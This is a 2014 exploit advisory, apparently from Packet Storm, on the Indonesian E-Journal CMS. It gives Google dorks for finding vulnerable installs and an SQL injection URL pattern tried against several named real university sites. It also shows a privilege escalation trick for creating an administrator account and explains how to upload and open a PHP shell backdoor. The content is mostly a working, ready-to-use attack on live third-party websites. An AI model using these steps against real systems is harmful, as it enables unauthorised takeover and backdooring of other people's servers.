what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

E-Journal 1.0 Shell Upload / SQL Injection

E-Journal 1.0 Shell Upload / SQL Injection
Posted Dec 17, 2014
Authored by X-Cisadane

E-Journal version 1.0 suffers from remote shell upload, privilege escalation, and remote SQL injection vulnerabilities.

tags | exploit, remote, shell, vulnerability, sql injection
SHA-256 | 1894ccb36158f5e94c713534272cd9f288e7404d8bf5fe85c3a1409eebbdaca6

E-Journal 1.0 Shell Upload / SQL Injection

Change Mirror Download
========================================================================================== 
E-Journal (Old Version) Multiple Vulnerabilities
==========================================================================================

:-------------------------------------------------------------------------------------------------------------------------:
: # Exploit Title : E-Journal (Old Version) Multiple Vulnerabilities
: # Date : 17th December 2014
: # Author : X-Cisadane
: # CMS Developer : http://simlitabmas.dikti.go.id/ejournal/
: # Version : Old Version
: # CMS Language : Indonesian
: # Category : Web Applications
: # Vulnerability : SQL Injection, Privilege Escalation and File Upload Vulnerability
: # Tested On : Google Chrome Version 39.0.2171.95 m (Windows 7 Ultimate 32-Bit English)
: # Greetz to : X-Code YogyaFree, Explore Crew, CodeNesia, Bogor Hackers Community, Tomi Zaoldyeck and Winda Utari
:-------------------------------------------------------------------------------------------------------------------------:

DORKS (How to find the target) :
================================
inurl:mahasiswa.php intitle:E-Journal
inurl:dosen.php intitle:E-Journal
inurl:jurnal.php intitle:E-Journal
inurl:dokumen.php intitle:E-Journal
"Karya Tulis Mahasiswa" intitle:E-Journal
"Design & Programming by" intitle:E-Journal
"E-Journal adalah aplikasi berbasis web untuk"
Or use your own Google Dorks :)

P.S : This E-Journal CMS has 2 versions, The Old Version doesn't have informasi.php (Informasi Menu).

Proof of Concept
================

[ 1 ] SQL Injection
POC :
http://[Site]/[Path]/jurnal.php?detail=jurnal&id=['SQLi]

Example :
http://e-journal.uniga.ac.id/jurnal.php?detail=jurnal&id='133
http://www.ejournal-fkipunibba.com/jurnal.php?detail=jurnal&id='133
http://e-journal.uika-bogor.ac.id/jurnal.php?detail=jurnal&id='133
http://ejurnal.unjani.ac.id/jurnal.php?detail=jurnal&id='133
http://ejournal.stikesborromeus.ac.id/jurnal.php?detail=jurnal&id='133
...etc...

[ 2 ] Privilege Escalation
You can create a new Administrator Account by Using this Trick.
For Example my Target is : http://www.ejournal-fisipunla.com/

Step 1 : Add data.php?tambah=dosen in the URL
So in this case the URL was http://www.ejournal-fisipunla.com/data.php?tambah=dosen

Step 2 : Then you can see this notice : "ANDA TIDAK BERHAK MENGAKSES HALAMAN INI. SILAHKAN ANDA LOGIN SEBAGAI ADMINISTRATOR".
Ignore that Notice and click Admin Menu.
Screenshot #1 : http://i59.tinypic.com/54he2b.png

Step 3 : Tadaaa... Now you can add an Administrator Account.
Screenshot #2 : http://i59.tinypic.com/2i8vyus.png

[ 3 ] Upload PHP File (PHP Shell / Backdoor)
After New Administrator Account was Created, you can logon as an Administrator and Upload a Php File.

Admin Control Panel Path : http://[Site]/[Path]/admin.php
Example : http://www.ejournal-fisipunla.com/admin.php

Then Upload your PHP Shell / Backdoor from http://[Site]/[Path]/data.php?tambah=dosen
Upload your Php File in the File and Cover form.
Screenshot #3 : http://i59.tinypic.com/24cxhrc.png

Open your Backdoor / PHP Shell in :
http://[Site]/[Path]/cover/your php file name.php
http://[Site]/[Path]/file/your php file name.php
Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close